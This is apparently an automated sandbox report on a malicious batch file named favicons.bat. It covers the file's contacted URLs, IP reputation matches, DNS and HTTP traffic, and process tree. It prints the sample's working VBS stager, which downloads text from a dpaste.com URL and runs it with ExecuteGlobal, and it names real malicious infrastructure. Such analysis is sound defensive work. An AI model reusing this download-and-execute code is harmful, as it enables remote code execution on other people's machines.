https://dpaste.b-cdn.net/static/pastebin/site.webmanifest | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dpaste.b-cdn.net/static/pastebin/css/main.css | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dpaste.com/9A4PA9CZ5.txte | wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://widget.freshworks.com/widgets/2 | wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://dpaste.com/9A4PA9CZ5.txtT;P | wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dpaste.b-cdn.net/static/pastebin/css/skeleton.css | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dpaste.b-cdn.net/static/pastebin/favicon-16x16.png | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js | wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://media.ethicalads.io/media/client/ethicalads.min.js | wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://dpaste.b-cdn.net/static/pastebin/apple-touch-icon.png | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://unpkg.com/htmx.org | wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://dpaste.com/9A4PA9CZ5.txt. | wscript.exe, 00000002.00000003.1002526300.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004094756.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fosstodon.org/ | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://dpaste.com/9A4PA9CZ5.txtR | wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dpaste.b-cdn.net/static/pastebin/css/normalize.css | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://unpkg.cd | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dpaste.b-cdn.net/static/pastebin/favicon.ico | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dpaste.com/ | wscript.exe, 00000002.00000003.1002808390.000001D5F21FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1003966687.000001D5F21FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dpaste.b-cdn.net/static/pastebin/favicon-32x32.png | wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://widget.freshworks.com/widgets/22000000180.js | wscript.exe, 00000002.00000003.1002526300.000001D5F41E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp | false |  | high
IP | Domain | Country | ASN | ASN Name | Malicious
35.173.69.207 | webapp-837091.pythonanywhere.com | United States | 14618 | AMAZON-AESUS | true
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1646806
                    Start date and time:2025-03-24 09:47:10 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 2m 39s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:favicons.bat
                    Detection:MAL
                    Classification:mal88.spre.troj.evad.winBAT@6/2@3/1
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .bat
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): dllhost.exe
• Not all processes were analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
35.173.69.207 | YG.ps1 | malicious | FormBook | www.optimuminvestment.net/poqh/
35.173.69.207 | YG.exe | malicious | FormBook | www.optimuminvestment.net/poqh/
35.173.69.207 | payment copy.exe | malicious | FormBook | www.optimuminvestment.net/poqh/
35.173.69.207 | Quotation.exe | malicious | FormBook | www.optimuminvestment.net/w42a/
35.173.69.207 | Quotation.exe | malicious | FormBook | www.optimuminvestment.net/w42a/
35.173.69.207 | Quotation.exe | malicious | FormBook | www.optimuminvestment.net/w42a/
35.173.69.207 | LRG1UB6Fqf.exe | malicious | FormBook | www.aicycling.pro/2z4e/
35.173.69.207 | vNAOY88XCO.exe | malicious | FormBook | www.aicycling.pro/2z4e/
35.173.69.207 | PO-009172433.exe | malicious | FormBook | www.aicycling.pro/2z4e/
35.173.69.207 | PO-000320188.exe | malicious | FormBook | www.aicycling.pro/2z4e/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
webapp-837091.pythonanywhere.com | nicworkingskillbetterwithnicetechnology.hta | malicious | Unknown | 35.173.69.207
webapp-837091.pythonanywhere.com | bestbeautifulthingsentiretimebetterresultsgive.hta | malicious | Unknown | 35.173.69.207
webapp-837091.pythonanywhere.com | milkmaidproductsareveryniceforentiretimetogivemebest.hta | malicious | Cobalt Strike, Remcos | 35.173.69.207
webapp-837091.pythonanywhere.com | SecuriteInfo.com.decompression.bomb.470.25928.exe | malicious | Stealit | 35.173.69.207
webapp-837091.pythonanywhere.com | hCWsFcDmLl.exe | malicious | LimeRAT | 35.173.69.207
webapp-837091.pythonanywhere.com | #PO-39025371521.vbs | malicious | Unknown | 35.173.69.207
webapp-837091.pythonanywhere.com | Quote Request #10551 from VistaJet Ltd.vbs | malicious | Unknown | 35.173.69.207
webapp-837091.pythonanywhere.com | #PO-202264946241.vbs | malicious | AsyncRAT, DcRat | 35.173.69.207
webapp-837091.pythonanywhere.com | ServiceHub.exe | malicious | LimeRAT | 35.173.69.207

Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AESUS | https://www.powerflexweb.com/centers_redirect_log.php?idDivision=88&nameDivision=https://gamma.app/docs/SHAREPOINT-FILE-RECEIVED-v0g983lw02btb16mode=doc&idModule=m583&nameModule=myStrength&idElement=1137&nameElement=ProviderSearch&url=https://gamma.app/docs/SHAREPOINT-FILE-RECEIVED-v0g983lw02btb16 | malicious | Unknown | 44.208.37.67
AMAZON-AESUS | Invoice Number INV132146-1.pdf | malicious | Unknown | 3.219.243.226
AMAZON-AESUS | https://tl.phoneky.com/android/?id=d1d149166 | malicious | Unknown | 3.210.72.191
AMAZON-AESUS | https://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuL | malicious | Unknown | 34.202.123.204
AMAZON-AESUS | resgod.m68k.elf | malicious | Mirai | 44.222.19.197
AMAZON-AESUS | https://steigerwaldt.com/ | malicious | Unknown | 18.233.211.187
AMAZON-AESUS | nicworkingskillbetterwithnicetechnology.hta | malicious | Unknown | 35.173.69.207
AMAZON-AESUS | owari.i686.elf | malicious | Unknown | 54.80.227.227
AMAZON-AESUS | owari.spc.elf | malicious | Unknown | 18.207.39.188
AMAZON-AESUS | owari.m68k.elf | malicious | Unknown | 52.6.223.246

Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | Pendiente De Transferencia.exe | malicious | GuLoader, Snake Keylogger | 35.173.69.207
37f463bf4616ecd445d4a1937da06e19 | iEGOVnrFG7.exe | malicious | Unknown | 35.173.69.207
37f463bf4616ecd445d4a1937da06e19 | 1F746kAKk9.exe | malicious | Unknown | 35.173.69.207
37f463bf4616ecd445d4a1937da06e19 | 9QzBpAFWOl.exe | malicious | Unknown | 35.173.69.207
37f463bf4616ecd445d4a1937da06e19 | I82ebpwgZg.exe | malicious | Unknown | 35.173.69.207
37f463bf4616ecd445d4a1937da06e19 | Payment Advice 24-03-2025.docx.doc | malicious | Unknown | 35.173.69.207
37f463bf4616ecd445d4a1937da06e19 | random(2).exe | malicious | Vidar | 35.173.69.207
37f463bf4616ecd445d4a1937da06e19 | advnrNo.exe | malicious | Vidar | 35.173.69.207
37f463bf4616ecd445d4a1937da06e19 | 1 (1036).exe | malicious | Unknown | 35.173.69.207
                    No context
                    Process:C:\Windows\System32\cmd.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):287
                    Entropy (8bit):5.03647949210045
                    Encrypted:false
                    SSDEEP:6:ZLs0IgLgmRLl0pIgCQ9vDz0LgDHCBkCLgMJgC0LSFugHVAATAW:PjPRgvDzZHCaGnVlTAW
                    MD5:32E5748C7D30285DCAED2BA56D0639C5
                    SHA1:49C557FBF1363819D2AC7F59061CE23F326172B3
                    SHA-256:925C03E8B73BBAE236A6FC713861986726BD69D4200E830E968BA910132A79FF
                    SHA-512:2EFE851B0B2DBEB994B37BAE649A0BEEAD5AA3D3B580712405944E6284B3920F70258CFA7841FB44A7EB523BE449987BFD57359B767C4AC17B2997DE9BA423A0
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_VBS_Downloader_Generic, Description: Yara detected VBS Downloader Generic, Source: C:\Windows\Temp\trickishly.vbs, Author: Joe Security
                    Reputation:low
                    Preview:Dim noncatalog, documentarist..noncatalog = "https://dpaste.com/9A4PA9CZ5.txt"..Set documentarist = CreateObject("MSXML2.XMLHTTP")..documentarist.open "GET", noncatalog, False..documentarist.send..If documentarist.Status = 200 Then.. ExecuteGlobal documentarist.responseText..End If..
                    Process:C:\Windows\System32\timeout.exe
                    File Type:ASCII text, with CRLF line terminators, with overstriking
                    Category:dropped
                    Size (bytes):53
                    Entropy (8bit):4.538872341192371
                    Encrypted:false
                    SSDEEP:3:hYFnjQGARcWmFsFJQZov:hYFWmFSQZov
                    MD5:5BFD4A973BE54A8EBC2A7F79CFCF4B6C
                    SHA1:071E9887A3B0E5500EC2116564E4DF0962946CB6
                    SHA-256:BBDCFB24BDD6DE329D8616497FE5F0C7F4644A484B825632339127F6E2CCA843
                    SHA-512:F4CD10A9977B515B39946870981E9DE599040B442AE890073B6FD04DD3086CACD6F32F19888575ECB7CC5A3A0C4408513983E6CAFCBCF5B50E140F4BDCF507D9
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:..Waiting for 1 seconds, press CTRL+C to quit ....0..
                    File type:DOS batch file, ASCII text, with CRLF line terminators
                    Entropy (8bit):4.994661830344255
                    TrID:
                      File name:favicons.bat
                      File size:540 bytes
                      MD5:50c0f17b4addbc0d98f32424c0b55126
                      SHA1:a2f08d69be6b8ff0a7619cdf0149f5711aeb3a04
                      SHA256:26f90d8432f13b001842cf15250cfefc867b74ffd22ee0fc0afce1087e5f9f91
                      SHA512:0009e146d42d44d7a3b13790784121faf8b941de3b6066406334fb2749ffbe0bb292518a0bdba6924658855a00b319e3209039db0ca6c52d2cd5046e1467a472
                      SSDEEP:12:w7x3zseHvRielDzoCJMHCg/7BOxMVlT2V0RwKN3hl:w7xoA5+3xxOowyb
                      TLSH:B2F02B3E6A069061367B8C5894667602F95E404BB60BAC79708FC0223F51ACA95D80C1
                      File Content Preview:@echo off..setlocal..set "fugues=C:\Windows\Temp\trickishly.vbs"..>"%fugues%" (.. echo Dim noncatalog, documentarist.. echo noncatalog = "https://dpaste.com/9A4PA9CZ5.txt".. echo Set documentarist = CreateObject^("MSXML2.XMLHTTP"^).. echo docu
                      Icon Hash:9686878b929a9886


                      • Total Packets: 15
                      • 443 (HTTPS)
                      • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 24, 2025 09:48:23.783925056 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:23.783957958 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:23.784043074 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:23.794972897 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:23.794997931 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:24.010560036 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:24.010690928 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:24.072506905 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:24.072526932 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:24.072935104 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:24.073004007 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:24.075793028 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:24.116317034 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:24.272140980 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:24.272207975 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:24.272289038 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:24.272304058 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:24.272351027 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:24.272380114 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:24.272380114 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Mar 24, 2025 09:48:24.272428036 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:24.275604010 CET | 49692 | 443 | 192.168.2.8 | 35.173.69.207
Mar 24, 2025 09:48:24.275624990 CET | 443 | 49692 | 35.173.69.207 | 192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 24, 2025 09:48:20.762913942 CET | 50093 | 53 | 192.168.2.8 | 1.1.1.1
Mar 24, 2025 09:48:21.759799957 CET | 50093 | 53 | 192.168.2.8 | 1.1.1.1
Mar 24, 2025 09:48:22.759587049 CET | 50093 | 53 | 192.168.2.8 | 1.1.1.1
Mar 24, 2025 09:48:23.777298927 CET | 53 | 50093 | 1.1.1.1 | 192.168.2.8
Mar 24, 2025 09:48:23.777358055 CET | 53 | 50093 | 1.1.1.1 | 192.168.2.8
Mar 24, 2025 09:48:23.777394056 CET | 53 | 50093 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 24, 2025 09:48:20.762913942 CET | 192.168.2.8 | 1.1.1.1 | 0xb480 | Standard query (0) | dpaste.com | A (IP address) | IN (0x0001) | false
Mar 24, 2025 09:48:21.759799957 CET | 192.168.2.8 | 1.1.1.1 | 0xb480 | Standard query (0) | dpaste.com | A (IP address) | IN (0x0001) | false
Mar 24, 2025 09:48:22.759587049 CET | 192.168.2.8 | 1.1.1.1 | 0xb480 | Standard query (0) | dpaste.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 24, 2025 09:48:23.777298927 CET | 1.1.1.1 | 192.168.2.8 | 0xb480 | No error (0) | dpaste.com | webapp-837091.pythonanywhere.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 24, 2025 09:48:23.777298927 CET | 1.1.1.1 | 192.168.2.8 | 0xb480 | No error (0) | webapp-837091.pythonanywhere.com |  | 35.173.69.207 | A (IP address) | IN (0x0001) | false
Mar 24, 2025 09:48:23.777358055 CET | 1.1.1.1 | 192.168.2.8 | 0xb480 | No error (0) | dpaste.com | webapp-837091.pythonanywhere.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 24, 2025 09:48:23.777358055 CET | 1.1.1.1 | 192.168.2.8 | 0xb480 | No error (0) | webapp-837091.pythonanywhere.com |  | 35.173.69.207 | A (IP address) | IN (0x0001) | false
Mar 24, 2025 09:48:23.777394056 CET | 1.1.1.1 | 192.168.2.8 | 0xb480 | No error (0) | dpaste.com | webapp-837091.pythonanywhere.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 24, 2025 09:48:23.777394056 CET | 1.1.1.1 | 192.168.2.8 | 0xb480 | No error (0) | webapp-837091.pythonanywhere.com |  | 35.173.69.207 | A (IP address) | IN (0x0001) | false
                      • dpaste.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49692 | 35.173.69.207 | 443 | 6844 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-24 08:48:24 UTC | 327 | OUT | GET /9A4PA9CZ5.txt HTTP/1.1
                      Accept: */*
                      Accept-Language: en-ch
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Host: dpaste.com
                      Connection: Keep-Alive
2025-03-24 08:48:24 UTC | 491 | IN | HTTP/1.1 404 Not Found
                      Date: Mon, 24 Mar 2025 08:48:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 4133
                      Connection: close
                      Vary: Accept-Encoding
                      Vary: Cookie, origin
                      Set-Cookie: messages=.eJwtyUEKwjAQQNGrjLPpJhgR3NWeQnBRShjipI0mGcmk9foWFP7qv3FE554qxWVWpZnRnMz5YvDOyUtmaAKPN2njA9wElLZ9LVGB9iDQJjU2BqkQJCX5_HBVrgZ6gqVyuHaWvJe1NLVJ5lhsN2R6MVCBP_SWhiMaxGn6AiupMQo:1twdTs:_Av55Wbdsul9IKStwrSRihmIjREDzhEy9nTCZNZLhGA; HttpOnly; Path=/; SameSite=Lax
                      Server: PythonAnywhere
2025-03-24 08:48:24 UTC | 4133 | IN | Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="google-site-verification" content="m41-YA2o4kXb32RmyuClA1zAXZCyaGaDEUj1QIc5bmc" />



                      Target ID:0
                      Start time:04:48:19
                      Start date:24/03/2025
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" "
                      Imagebase:0x7ff6aadf0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:1
                      Start time:04:48:19
                      Start date:24/03/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6e60e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:2
                      Start time:04:48:19
                      Start date:24/03/2025
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:wscript //nologo "C:\Windows\Temp\trickishly.vbs"
                      Imagebase:0x7ff709be0000
                      File size:170'496 bytes
                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:04:48:19
                      Start date:24/03/2025
                      Path:C:\Windows\System32\timeout.exe
                      Wow64 process (32bit):false
                      Commandline:timeout /t 1 /nobreak
                      Imagebase:0x7ff71e2a0000
                      File size:32'768 bytes
                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      No disassembly